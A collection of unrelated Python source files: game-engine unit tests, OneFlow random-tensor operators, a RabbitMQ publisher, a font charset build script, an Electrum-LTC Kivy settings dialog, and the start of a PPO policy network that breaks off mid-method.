self.assertEqual(shieldHitData.shieldAbsorptionValue, 0, 'Shields are down everything passes through')
self.assertEqual(shieldHitData.degradedTorpedoHitValue, 1000, 'We should get whacked')
self._devices.setDeviceStatus(DeviceType.Shields, saveShieldStatus)
def testComputeHit(self):
for pType in PlayerType:
computedHit = self._commonComputeHit(playerType=pType)
self.assertFalse(computedHit == 0.0, "Can't have non-hit")
self.logger.info(f"computedHit for {pType.__repr__()}: {computedHit}")
def testComputeEnergyWhenBlockedNominal(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=5, y=5)
expectedStopEnergy: float = 76.57
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyWhenBlockedMaximum(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=8, y=8)
expectedStopEnergy: float = 118.99
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Maximum case does not compute')
def testComputeEnergyWhenBlockedMinimum(self):
startSector: Coordinates = Coordinates(x=1, y=1)
endSector: Coordinates = Coordinates(x=1, y=2)
expectedStopEnergy: float = 30.0
decimalPlace: int = 2
stopEnergy: float = self._gameEngine.computeEnergyWhenBlocked(startSector=startSector, endSector=endSector)
self.logger.info(f'{stopEnergy}')
self.assertAlmostEqual(expectedStopEnergy, stopEnergy, decimalPlace, 'Minimum test does not compute')
def testComputeCloseCoordinates(self):
"""
Loop until all directions tested
"""
testedDirections: TestedDirections = self._initDirectionTest()
targetCoordinates: Coordinates = Coordinates(x=5, y=5)
while self._areAllDirectionsValidated(testedDirections=testedDirections) is False:
directionData: DirectionData = self._gameEngine.computeCloseCoordinates(targetCoordinates=targetCoordinates)
testedDirections[directionData.direction] = True
self._validateReturn(targetCoordinates=targetCoordinates, directionData=directionData)
self.logger.debug(f'All directions tested: {testedDirections=}')
def testComputeEnergyForWarpTravelMediumDistanceMediumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=5.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 255.05
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMediumDistanceMaximumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=9.9)
self.logger.info(f'{energy=}')
expectedEnergy: float = 1945.65
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMediumDistanceMinimumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=5, warpFactor=1.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 7.05
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMediumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=5.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 262.05
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMaximumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=9.9)
self.logger.info(f'{energy=}')
expectedEnergy: float = 1952.65
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def testComputeEnergyForWarpTravelMaximumDistanceMinimumSpeed(self):
energy: float = self._gameEngine.computeEnergyForWarpTravel(travelDistance=12, warpFactor=1.0)
self.logger.info(f'{energy=}')
expectedEnergy: float = 14.05
decimalPlace: int = 2
self.assertAlmostEqual(expectedEnergy, energy, decimalPlace, 'Nominal test does not compute')
def _commonComputeHit(self, playerType: PlayerType) -> float:
self._gameState.playerType = playerType
shooterPosition: Coordinates = Coordinates(x=7, y=7)
targetPosition: Coordinates = Coordinates(x=3, y=7)
klingonPower: float = 348.0
computedHit = self._gameEngine.computeHit(shooterPosition=shooterPosition,
targetPosition=targetPosition,
klingonPower=klingonPower)
return computedHit
def _initDirectionTest(self) -> TestedDirections:
testedDirections: TestedDirections = TestedDirections({})
for direction in Direction:
testedDirections[direction] = False
return testedDirections
def _validateReturn(self, targetCoordinates: Coordinates, directionData: DirectionData):
direction: Direction = directionData.direction
coordinates: Coordinates = directionData.coordinates
targetX: int = targetCoordinates.x
targetY: int = targetCoordinates.y
newX: int = coordinates.x
newY: int = coordinates.y
if direction == Direction.North:
self.assertEqual(newX, targetX, 'X should be unchanged for North')
self.assertEqual(newY, targetY - 1, 'Y should be less one for North')
elif direction == Direction.South:
self.assertEqual(newX, targetX, 'X should be unchanged for South')
self.assertEqual(newY, targetY + 1, 'Y should be one more for South')
elif direction == Direction.East:
self.assertEqual(newX, targetX + 1, 'X should be one more for East')
self.assertEqual(newY, targetY, 'Y should be unchanged for East')
elif direction == Direction.West:
self.assertEqual(newX, targetX - 1, 'X should be one less for West')
self.assertEqual(newY, targetY, 'Y should be unchanged for West')
elif direction == Direction.NorthEast:
self.assertEqual(newX, targetX + 1, 'X should be one 1 more for NorthEast')
self.assertEqual(newY, targetY - 1, 'Y should be 1 less for NorthEast')
elif direction == Direction.SouthEast:
self.assertEqual(newX, targetX + 1, 'X should be one 1 more for SouthEast')
self.assertEqual(newY, targetY + 1, 'Y should be 1 more for SouthEast')
elif direction == Direction.NorthWest:
self.assertEqual(newX, targetX - 1, 'X should be one 1 less for NorthWest')
self.assertEqual(newY, targetY - 1, 'Y should be 1 less for NorthWest')
elif direction == Direction.SouthWest:
self.assertEqual(newX, targetX - 1, 'X should be one 1 less for SouthWest')
self.assertEqual(newY, targetY + 1, 'Y should be 1 more for SouthWest')
self.logger.info(f'{direction.name} passed')
def _areAllDirectionsValidated(self, testedDirections: TestedDirections) -> bool:
"""
Args:
testedDirections: The tested directions dictionary
Returns: False if at least one entry is True
"""
for value in testedDirections.values():
if value is False:
return False
return True
def _runPhaserTest(self, shooterCoordinates: Coordinates, targetCoordinates: Coordinates, expectedPhaserHit: float):
distance: float = self._computer.computeQuadrantDistance(startSector=shooterCoordinates, endSector=targetCoordinates)
enemyPower: float = 500.0
powerAmount: float = 500.0
phaserHit: float = self._gameEngine.doPhasers(distance=distance, enemyPower=enemyPower, powerAmount=powerAmount)
self.assertAlmostEqual(expectedPhaserHit, phaserHit, places=1)
self.logger.info(f'{phaserHit=}')
def suite() -> TestSuite:
"""You need to change the name of the test class here also."""
import unittest
testSuite: TestSuite = TestSuite()
# noinspection PyUnresolvedReferences
testSuite.addTest(unittest.makeSuite(TestGameEngine))
return testSuite
if __name__ == '__main__':
unitTestMain()
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional, Union
import oneflow as flow
from oneflow.nn.module import Module
from oneflow.nn.modules.utils import _single
def _rand_op_common_process(
size, device=None, generator=None, placement=None, sbp=None
):
if isinstance(device, str):
device = flow.device(device)
size = _single(size)
processed_sbp = sbp
if placement is not None:
if isinstance(processed_sbp, flow.sbp.sbp):
processed_sbp = (processed_sbp,)
return size, device, generator, placement, processed_sbp
class Rand(Module):
def __init__(
self,
size,
generator=None,
dtype=None,
layout=None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
def forward(self):
if self.placement is not None:
res = flow._C.rand(
self.size,
placement=self.placement,
sbp=self.sbp,
dtype=self.dtype,
generator=self.generator,
)
else:
res = flow._C.rand(
self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
)
res.requires_grad = self.requires_grad
return res
def rand_op(
*size,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False
):
"""
Returns a tensor filled with random numbers from a uniform distribution on the interval [0, 1)
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.float32``.
layout (optional): The desired layout of returned Tensor.
generator (flow.Generator, optional): a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
placement (flow.placement, optional): The desired device of returned consistent tensor. If None, will
construct local tensor.
sbp (flow.sbp, optional): The desired sbp of returned consistent tensor. It must be equal with the
numbers of placement.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> x = flow.rand(3,3)
>>> x.shape
oneflow.Size([3, 3])
>>> x.is_consistent
False
>>> placement = flow.placement("cpu", {0: [0]})
>>> sbp = flow.sbp.broadcast
>>> x = flow.rand(3, 3, placement=placement, sbp=sbp)
>>> x.is_consistent
True
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.rand(
size=size,
placement=placement,
sbp=sbp,
dtype=dtype,
generator=generator,
requires_grad=requires_grad,
)
else:
return flow._C.rand(
size=size,
dtype=dtype,
device=device,
generator=generator,
requires_grad=requires_grad,
)
class RandN(Module):
def __init__(
self,
size,
generator=None,
dtype=None,
layout=None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
def forward(self):
if self.placement is not None:
res = flow._C.randn(
self.size,
placement=self.placement,
sbp=self.sbp,
dtype=self.dtype,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randn(
self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res
def randn_op(
*size,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False
):
"""
Returns a tensor filled with random numbers from a normal distribution with mean 0 and variance 1 (also called the standard normal distribution).
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.float32``.
layout (optional): The desired layout of returned Tensor.
generator (flow.Generator, optional): a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
placement (flow.placement, optional): The desired device of returned consistent tensor. If None, will
construct local tensor.
sbp (flow.sbp, optional): The desired sbp of returned consistent tensor. It must be equal with the
numbers of placement.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> x = flow.randn(3,3)
>>> x.shape
oneflow.Size([3, 3])
>>> x.is_consistent
False
>>> placement = flow.placement("cpu", {0:[0]})
>>> sbp = flow.sbp.broadcast
>>> x = flow.randn(3,3,placement=placement,sbp=sbp)
>>> x.is_consistent
True
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.randn(
size=size,
placement=placement,
sbp=sbp,
dtype=dtype,
generator=generator,
requires_grad=requires_grad,
)
else:
return flow._C.randn(
size=size,
dtype=dtype,
device=device,
generator=generator,
requires_grad=requires_grad,
)
class RandInt(Module):
def __init__(
self,
low: flow.int64,
high: flow.int64,
size: tuple,
generator: flow.Generator = None,
dtype: Optional[flow.dtype] = None,
device=None,
placement=None,
sbp=None,
requires_grad=False,
) -> None:
super().__init__()
assert low < high
self.requires_grad = requires_grad
(
self.size,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process(size, device, generator, placement, sbp)
self.dtype = dtype
self.low = low
self.high = high
def forward(self):
if self.placement is not None:
res = flow._C.randint(
self.low,
self.high,
size=self.size,
placement=self.placement,
sbp_tuple=self.sbp,
dtype=self.dtype,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randint(
self.low,
self.high,
size=self.size,
dtype=self.dtype,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res
def randint_op(
low: flow.int64,
high: flow.int64,
size: tuple,
out=None,
generator=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
):
"""
Returns a tensor filled with random integers generated uniformly between low (inclusive) and high (exclusive).
The shape of the tensor is defined by the variable argument ``size``.
Args:
size (int... or oneflow.Size): Defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple or oneflow.Size.
out (optional): The output tensor.
dtype (flow.dtype, optional): The desired data type of returned tensor. Default: ``flow.int64``.
layout (optional): The desired layout of returned Tensor.
generator (flow.Generator, optional) – a pseudorandom number generator for sampling
device (flow.device, optional): The desired device of returned local tensor. If None, uses the
current device.
placement (flow.placement, optional): The desired device of returned consistent tensor. If None, will
construct local tensor.
sbp (flow.sbp, optional): The desired sbp of returned consistent tensor. It must be equal with the
numbers of placement.
requires_grad (bool, optional): If autograd should record operations on the returned tensor. Default: False.
For example:
.. code-block:: python
>>> import oneflow as flow
>>> generator = flow.Generator()
>>> generator.manual_seed(0)
>>> flow.randint(0, 5, (3,3), generator=generator)
tensor([[2, 2, 3],
[4, 3, 4],
[2, 4, 2]], dtype=oneflow.int64)
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
if placement is not None:
return flow._C.randint(
low,
high,
size=size,
generator=generator,
dtype=dtype,
placement=placement,
sbp_tuple=sbp,
requires_grad=requires_grad,
)
else:
return flow._C.randint(
low,
high,
size=size,
generator=generator,
dtype=dtype,
device=device,
requires_grad=requires_grad,
)
class RandPerm(Module):
def __init__(
self,
n,
generator: flow.Generator = None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
pin_memory: bool = False,
) -> None:
super().__init__()
assert n >= 0
self.n = n
self.dtype = dtype
(
_,
self.device,
self.generator,
self.placement,
self.sbp,
) = _rand_op_common_process((), device, generator, placement, sbp)
self.requires_grad = requires_grad
def forward(self, out=None):
if self.placement is not None:
res = flow._C.randperm(
self.n,
placement=self.placement,
sbp=self.sbp,
generator=self.generator,
requires_grad=self.requires_grad,
)
else:
res = flow._C.randperm(
self.n,
device=self.device,
generator=self.generator,
requires_grad=self.requires_grad,
)
return res.to(dtype=self.dtype)
def randperm_op(
n: flow.int64,
generator: flow.Generator = None,
out=None,
dtype: Optional[flow.dtype] = None,
layout=None,
device: Union[flow.device, str, None] = None,
placement: flow.placement = None,
sbp: flow._oneflow_internal.sbp.sbp = None,
requires_grad: bool = False,
pin_memory: bool = False,
) -> flow.Tensor:
r"""
Returns a random permutation of integers from ``0`` to ``n - 1``.
Args:
n (int): the upper bound (exclusive)
Keyword args:
generator(:class:`oneflow.Generator`, optional): a pseudorandom number generator for sampling
out (Tensor, optional): output Tensor,not supported yet.
dtype (:class:`oneflow.dtype`, optional): the desired data type of returned tensor.
Default: ``oneflow.int64``.
layout: layout is not supported yet.
device: the desired device of returned tensor. Default: cpu.
placement:(:class:`flow.placement`, optional): The desired device of returned consistent tensor. If None,
will construct local tensor.
sbp: (:class:`flow.sbp`, optional): The desired sbp of returned consistent tensor. It must be equal with the
numbers of placement.
requires_grad(bool, optional): If autograd should record operations on the returned tensor. Default: False.
pin_memory(bool, optional):pin_memory is not supported yet.
Example:
.. code-block:: python
>>> import oneflow as flow
>>> generator = flow.Generator()
>>> generator.manual_seed(0)
>>> flow.randperm(5, generator=generator)
tensor([2, 4, 3, 0, 1], dtype=oneflow.int64)
"""
assert out is None, "out not supported yet"
assert layout is None, "layout not supported yet"
assert pin_memory is False, "pin_memory not supported yet"
if dtype is None:
dtype = flow.int64
if placement is not None:
return flow._C.randperm(
n=n,
placement=placement,
sbp=sbp,
generator=generator,
requires_grad=requires_grad,
).to(dtype)
else:
return flow._C.randperm(
n=n, device=device, generator=generator, requires_grad=requires_grad
).to(dtype)
if __name__ == "__main__":
import doctest
doctest.testmod(raise_on_error=True)
|
import pika
class PikaPublisher(object):
def __init__(self, exchange_name):
self.exchange_name = exchange_name
self.queue_exists = False
def publish(self, message, routing_key):
conn = pika.AsyncoreConnection(pika.ConnectionParameters(
'127.0.0.1',
credentials=pika.PlainCredentials('guest', 'guest')))
ch = conn.channel()
ch.exchange_declare(exchange=self.exchange_name, type="fanout", durable=False, auto_delete=False)
ch.basic_publish(exchange=self.exchange_name,
routing_key=routing_key,
body=message,
properties=pika.BasicProperties(
content_type = "text/plain",
delivery_mode = 2, # persistent
),
block_on_flow_control = True)
ch.close()
conn.close()
def monitor(self, qname, callback):
conn = pika.AsyncoreConnection(pika.ConnectionParameters(
'127.0.0.1',
credentials=pika.PlainCredentials('guest', 'guest')))
ch = conn.channel()
if not self.queue_exists:
ch.queue_declare(queue=qname, durable=False, exclusive=False, auto_delete=False)
ch.queue_bind(queue=qname, exchange=self.exchange_name)
print "Binding queue %s to exchange %s" % (qname, self.exchange_name)
#ch.queue_bind(queue=qname, exchange=self.exchange_name, routing_key=qname)
self.queue_exists = True
ch.basic_consume(callback, queue=qname)
pika.asyncore_loop()
print 'Close reason:', conn.connection_close
|
#!/usr/bin/env python3
import re
import unicodedata
from glob import glob
patterns = [
'../../Assets/Nova/Fonts/CharsetChinese.txt',
'../../Assets/Resources/Scenarios/*.txt',
'../../Assets/Resources/LocalizedResources/*/Scenarios/*.txt',
'../../Assets/Resources/LocalizedStrings/*.json',
]
out_filename = '../../Assets/Nova/Fonts/Charset.txt'
out_bold_filename = '../../Assets/Nova/Fonts/CharsetBold.txt'
with open(out_filename, 'r', encoding='utf-8') as f:
old_text = f.read().strip('\n')
with open(out_bold_filename, 'r', encoding='utf-8') as f:
old_text_bold = f.read().strip('\n')
text = ''
for pattern in patterns:
for filename in glob(pattern):
print(filename)
with open(filename, 'r', encoding='utf-8') as f:
text += f.read()
bolds = re.compile('<b>(.*?)</b>').findall(text)
text = ''.join(sorted(set(text))).strip('\n')
text_bold = ''.join(sorted(set(''.join(bolds)))).strip('\n')
for c in text:
if unicodedata.category(c)[0] == 'C':
code = f'U+{ord(c):04X}'
print(f'Special character: {code}')
if all(x in old_text for x in text):
print('Need to rebuild font asset: NO')
else:
print('Need to rebuild font asset: YES')
with open(out_filename, 'w', encoding='utf-8', newline='\n') as f:
f.write(text)
if all(x in old_text_bold for x in text_bold):
print('Need to rebuild bold font asset: NO')
else:
print('Need to rebuild bold font asset: YES')
with open(out_bold_filename, 'w', encoding='utf-8', newline='\n') as f:
f.write(text_bold)
|
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from electrum_ltc.util import base_units_list
from electrum_ltc.i18n import languages
from electrum_ltc_gui.kivy.i18n import _
from electrum_ltc.plugins import run_hook
from electrum_ltc import coinchooser
from .choice_dialog import ChoiceDialog
Builder.load_string('''
#:import partial functools.partial
#:import _ electrum_ltc_gui.kivy.i18n._
<SettingsDialog@Popup>
id: settings
title: _('Electrum Settings')
disable_pin: False
use_encryption: False
BoxLayout:
orientation: 'vertical'
ScrollView:
GridLayout:
id: scrollviewlayout
cols:1
size_hint: 1, None
height: self.minimum_height
padding: '10dp'
SettingsItem:
lang: settings.get_language_name()
title: 'Language' + ': ' + str(self.lang)
description: _('Language')
action: partial(root.language_dialog, self)
CardSeparator
SettingsItem:
disabled: root.disable_pin
title: _('PIN code')
description: _("Change your PIN code.")
action: partial(root.change_password, self)
CardSeparator
SettingsItem:
bu: app.base_unit
title: _('Denomination') + ': ' + self.bu
description: _("Base unit for Litecoin amounts.")
action: partial(root.unit_dialog, self)
CardSeparator
SettingsItem:
status: root.fx_status()
title: _('Fiat Currency') + ': ' + self.status
description: _("Display amounts in fiat currency.")
action: partial(root.fx_dialog, self)
CardSeparator
SettingsItem:
status: 'ON' if bool(app.plugins.get('labels')) else 'OFF'
title: _('Labels Sync') + ': ' + self.status
description: _("Save and synchronize your labels.")
action: partial(root.plugin_dialog, 'labels', self)
CardSeparator
SettingsItem:
status: 'ON' if app.use_rbf else 'OFF'
title: _('Replace-by-fee') + ': ' + self.status
description: _("Create replaceable transactions.")
message:
_('If you check this box, your transactions will be marked as non-final,') \
+ ' ' + _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pays higher fees.') \
+ ' ' + _('Note that some merchants do not accept non-final transactions until they are confirmed.')
action: partial(root.boolean_dialog, 'use_rbf', _('Replace by fee'), self.message)
CardSeparator
SettingsItem:
status: _('Yes') if app.use_unconfirmed else _('No')
title: _('Spend unconfirmed') + ': ' + self.status
description: _("Use unconfirmed coins in transactions.")
message: _('Spend unconfirmed coins')
action: partial(root.boolean_dialog, 'use_unconfirmed', _('Use unconfirmed'), self.message)
CardSeparator
SettingsItem:
status: _('Yes') if app.use_change else _('No')
title: _('Use change addresses') + ': ' + self.status
description: _("Send your change to separate addresses.")
message: _('Send excess coins to change addresses')
action: partial(root.boolean_dialog, 'use_change', _('Use change addresses'), self.message)
# disabled: there is currently only one coin selection policy
#CardSeparator
#SettingsItem:
# status: root.coinselect_status()
# title: _('Coin selection') + ': ' + self.status
# description: "Coin selection method"
# action: partial(root.coinselect_dialog, self)
''')
class SettingsDialog(Factory.Popup):
def __init__(self, app):
self.app = app
self.plugins = self.app.plugins
self.config = self.app.electrum_config
Factory.Popup.__init__(self)
layout = self.ids.scrollviewlayout
layout.bind(minimum_height=layout.setter('height'))
# cached dialogs
self._fx_dialog = None
self._proxy_dialog = None
self._language_dialog = None
self._unit_dialog = None
self._coinselect_dialog = None
def update(self):
self.wallet = self.app.wallet
self.disable_pin = self.wallet.is_watching_only() if self.wallet else True
self.use_encryption = self.wallet.has_password() if self.wallet else False
def get_language_name(self):
return languages.get(self.config.get('language', 'en_UK'), '')
def change_password(self, item, dt):
self.app.change_password(self.update)
def language_dialog(self, item, dt):
if self._language_dialog is None:
l = self.config.get('language', 'en_UK')
def cb(key):
self.config.set_key("language", key, True)
item.lang = self.get_language_name()
self.app.language = key
self._language_dialog = ChoiceDialog(_('Language'), languages, l, cb)
self._language_dialog.open()
def unit_dialog(self, item, dt):
if self._unit_dialog is None:
def cb(text):
self.app._set_bu(text)
item.bu = self.app.base_unit
self._unit_dialog = ChoiceDialog(_('Denomination'), base_units_list,
self.app.base_unit, cb, keep_choice_order=True)
self._unit_dialog.open()
def coinselect_status(self):
return coinchooser.get_name(self.app.electrum_config)
def coinselect_dialog(self, item, dt):
if self._coinselect_dialog is None:
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
def cb(text):
self.config.set_key('coin_chooser', text)
item.status = text
self._coinselect_dialog = ChoiceDialog(_('Coin selection'), choosers, chooser_name, cb)
self._coinselect_dialog.open()
def proxy_status(self):
server, port, protocol, proxy, auto_connect = self.app.network.get_parameters()
return proxy.get('host') +':' + proxy.get('port') if proxy else _('None')
def proxy_dialog(self, item, dt):
if self._proxy_dialog is None:
server, port, protocol, proxy, auto_connect = self.app.network.get_parameters()
def callback(popup):
if popup.ids.mode.text != 'None':
proxy = {
'mode':popup.ids.mode.text,
'host':popup.ids.host.text,
'port':popup.ids.port.text,
'user':popup.ids.user.text,
'password':popup.ids.password.text
}
else:
proxy = None
self.app.network.set_parameters(server, port, protocol, proxy, auto_connect)
item.status = self.proxy_status()
popup = Builder.load_file('gui/kivy/uix/ui_screens/proxy.kv')
popup.ids.mode.text = proxy.get('mode') if proxy else 'None'
popup.ids.host.text = proxy.get('host') if proxy else ''
popup.ids.port.text = proxy.get('port') if proxy else ''
popup.ids.user.text = proxy.get('user') if proxy else ''
popup.ids.password.text = proxy.get('password') if proxy else ''
popup.on_dismiss = lambda: callback(popup)
self._proxy_dialog = popup
self._proxy_dialog.open()
def plugin_dialog(self, name, label, dt):
from .checkbox_dialog import CheckBoxDialog
def callback(status):
self.plugins.enable(name) if status else self.plugins.disable(name)
label.status = 'ON' if status else 'OFF'
status = bool(self.plugins.get(name))
dd = self.plugins.descriptions.get(name)
descr = dd.get('description')
fullname = dd.get('fullname')
d = CheckBoxDialog(fullname, descr, status, callback)
d.open()
def fee_status(self):
return self.config.get_fee_status()
def boolean_dialog(self, name, title, message, dt):
from .checkbox_dialog import CheckBoxDialog
CheckBoxDialog(title, message, getattr(self.app, name), lambda x: setattr(self.app, name, x)).open()
def fx_status(self):
fx = self.app.fx
if fx.is_enabled():
source = fx.exchange.name()
ccy = fx.get_currency()
return '%s [%s]' %(ccy, source)
else:
return _('None')
def fx_dialog(self, label, dt):
if self._fx_dialog is None:
from .fx_dialog import FxDialog
def cb():
label.status = self.fx_status()
self._fx_dialog = FxDialog(self.app, self.plugins, self.config, cb)
self._fx_dialog.open()
|
'''
Author: hanyu
Date: 2021-01-06 10:13:41
LastEditTime: 2021-01-09 09:31:12
LastEditors: hanyu
Description: policy network of PPO
FilePath: /test_ppo/examples/PPO_super_mario_bros/policy_graph.py
'''
from ray_helper.miscellaneous import tf_model_ws
def warp_Model():
'''
description: warp the policy model
param {*}
return {Object: policy model}
'''
import tensorflow as tf
from infer.categorical import categorical
from utils.get_shape import get_shape
@tf_model_ws
class Model(object):
def __init__(self,
act_space,
rnn,
use_rmc,
use_hrnn,
use_reward_prediction,
after_rnn,
use_pixel_control,
user_pixel_reconstruction,
scope='agent',
**kwargs):
self.act_space = act_space
self.use_rmc = use_rmc
self.use_hrnn = use_hrnn
self.scope = scope
self.s_t = kwargs.get('s')
self.prev_actions = kwargs.get('prev_a')
self.prev_r = kwargs.get('prev_r')
self.state_in = kwargs.get('state_in')
prev_a = tf.one_hot(self.prev_actions,
depth=act_space, dtype=tf.float32)
# Feature Network
self.feature, self.cnn_feature, self.image_feature, self.state_out = self.feature_net(
self.s_t, rnn, prev_a, self.prev_r, self.state_in, scope + '_current_feature')
if use_hrnn:
# TODO
pass
# Actor Network
self.current_act_logits = self.a_net(
self.feature, scope + '_acurrent')
self.current_act = tf.squeeze(
categorical(self.current_act_logits), axis=-1)
# Critic Network
self.current_value = self.v_net(self.feature, scope + '_vcurrent')
advantage = kwargs.get('adv', None)
if advantage is not None:
# Adavantage Normalization
# adv = (adv - adv_mean)
# adv = adv / adv_std
self.old_current_value = kwargs.get('v_cur')
self.ret = advantage + self.old_current_value
self.a_t = kwargs.get('a')
self.behavior_logits = kwargs.get('a_logits')
self.r_t = kwargs.get('r')
self.adv_mean = tf.reduce_mean(advantage, axis=[0, 1])
advantage -= self.adv_mean
self.adv_std = tf.math.sqrt(
tf.reduce_mean(advantage ** 2, axis=[0, 1]))
self.advantage = advantage / tf.maximum(self.adv_std, 1e-12)
self.slots = tf.cast(kwargs.get('slots'), tf.float32)
if use_reward_prediction:
# TODO
# reward prediction network
pass
if user_pixel_reconstruction:
# TODO
# pixerl reconstruction network
pass
if use_pixel_control:
# TODO
# pixel control network
pass
def get_current_act(self):
return self.current_act
def get_current_logits(self):
return self.current_act_logits
def feature_net(self, image, rnn, prev_a, prev_r, state_in, scope='feature'):
'''
description: feature-extraction network
param {
image: the input image
rnn: rnn network
prev_a: previous action
pre_v: previous value
state_in: state_in using in rnn
}
return {
Tensor[feature]: the feature input of actor&critic
Tensor[cnn_feature]: the cnn_feature input of reward prediction net
Tensor[image_feature]: the image_feature input of coex adm
Tensor[state_out]: the state_out after feature_net
}
'''
shape = get_shape(image)
with tf.variable_scope(scope, tf.AUTO_REUSE):
image = tf.reshape(image, [-1] + shape[-3:])
filter = [16, 32, 32]
kernel = [(3, 3), (3, 3), (5, 3)]
stride = [(1, 2), (1, 2), (2, 1)]
for i in range(len(filter)):
image = tf.layers.conv2d(
image,
filters=filter[i],
kernel_size=kernel[i][0],
strides=stride[i][0],
padding='valid',
activation=None,
name=f'conv_{i}'
)
image = tf.layers.max_pooling2d(
image,
pool_size=kernel[i][1],
strides=stride[i][1],
padding='valid',
name=f'max_pool_{i}'
)
image = self.residual_block(image, f'res0_{i}')
image = tf.nn.relu(image)
new_shape = get_shape(image)
# the batch_size & seqlen dimensions remain the same
image_feature = tf.reshape(
image, [shape[0], shape[1], new_shape[1], new_shape[2], new_shape[3]])
feature = tf.reshape(
image, [shape[0], shape[1], new_shape[1] * new_shape[2] * new_shape[3]])
cnn_feature = tf.layers.dense(
feature, 256, tf.nn.relu, name='feature')
feature = tf.concat(
[cnn_feature, prev_a, prev_r[:, :, None]], axis=-1)
if self.use_hrnn:
# TODO
pass
elif self.use_rmc:
# TODO
pass
else:
